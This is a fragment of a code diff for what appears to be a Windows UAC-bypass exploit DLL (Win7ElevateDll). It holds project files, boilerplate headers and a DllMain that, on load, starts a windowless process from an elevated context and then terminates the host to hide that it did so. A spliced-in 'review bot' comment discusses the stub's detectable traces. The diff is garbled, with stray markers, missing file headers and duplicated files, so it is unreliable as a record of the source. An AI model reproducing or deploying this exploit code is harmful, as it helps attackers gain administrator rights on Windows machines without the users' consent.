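+<Filter Include="Header Files">
+<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+</Filter>
+<Filter Include="Resource Files">
+<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+</Filter>
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="stdafx.h">
+<Filter>Header Files</Filter>
+</ClInclude>
+<ClInclude Include="targetver.h">
+<Filter>Header Files</Filter>
+</ClInclude>
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="stdafx.cpp">
+<Filter>Source Files</Filter>
+</ClCompile>
+<ClCompile Include="dllmain.cpp">
+<Filter>Source Files</Filter>
+</ClCompile>
+<ClCompile Include="..\CMMN.cpp">
+<Filter>Source Files</Filter>
+</ClCompile>
+</ItemGroup>
+</Project>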
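--- a/external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.user
+++ b/external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.user
@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+</Project>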
|
@ -0,0 +1,57 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <string>
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
//
|
||||
// Simple stub code that is used to create EXE within a alevated process.
|
||||
// Wee need to hide fact that we've started process thats why we immediately
|
||||
// Terminate host application.
|
||||
//
|
||||
CLogger::LogLine(TEXT("DLL: Hello"));
|
||||
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
{
|
||||
//
|
||||
// Obtaining TIOR path to be used for CreateProcess call
|
||||
//
|
||||
std::wstring cmd;
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORPath"), cmd );
|
||||
|
||||
STARTUPINFO startupInfo = {0};
|
||||
startupInfo.cb = sizeof(startupInfo);
|
||||
PROCESS_INFORMATION processInfo = {0};
|
||||
|
||||
CLogger::LogLine(TEXT("DLL: TIOR shell="));
|
||||
CLogger::LogLine(cmd);
|
||||
|
||||
//
|
||||
// Create not visible window
|
||||
//
|
||||
if (CreateProcess(cmd.c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW * 1, NULL, NULL, &startupInfo, &processInfo))
|
||||
{
|
||||
CloseHandle(processInfo.hProcess);
|
||||
CloseHandle(processInfo.hThread);
|
||||
}
|
||||
|
||||
ExitProcess(-69);
|
||||
}
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
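Review bot: The comment block at the top of DllMain is misspelled ("alevated", "Wee", "thats") and leaves out what the DLL_PROCESS_ATTACH branch does to the host, which matters to anyone triaging this file: it starts the executable named by the `w7e_TIORPath` value with `CREATE_NO_WINDOW` and then calls `ExitProcess(-69)`, so the `break` and `return TRUE` are never reached on that path. I would replace it with `// Stub: on process attach, start the executable named by w7e_TIORPath without a window, then end the host process.` and add `// Exit status is -69, i.e. 0xFFFFFFBB as a UINT; nothing after this line runs.` above the ExitProcess call. That exit status, a windowless child started from inside a DLL entry point, and the `DLL: Hello` / `DLL: TIOR shell=` lines written through CLogger (its sink is defined outside this hunk) are the observable traces of this stub, and stating them in the source helps whoever writes detections for it. Note also that the first LogLine sits before the `switch`, so it runs on thread attach and detach notifications as well.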
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// Win7ElevateDll.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,17 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
|
||||
// Windows Header Files:
|
||||
#include <windows.h>
|
||||
|
||||
|
||||
|
||||
// TODO: reference additional headers your program requires here
|
||||
#include <assert.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,17 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
|
||||
// Windows Header Files:
|
||||
#include <windows.h>
|
||||
|
||||
|
||||
|
||||
// TODO: reference additional headers your program requires here
|
||||
#include <assert.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|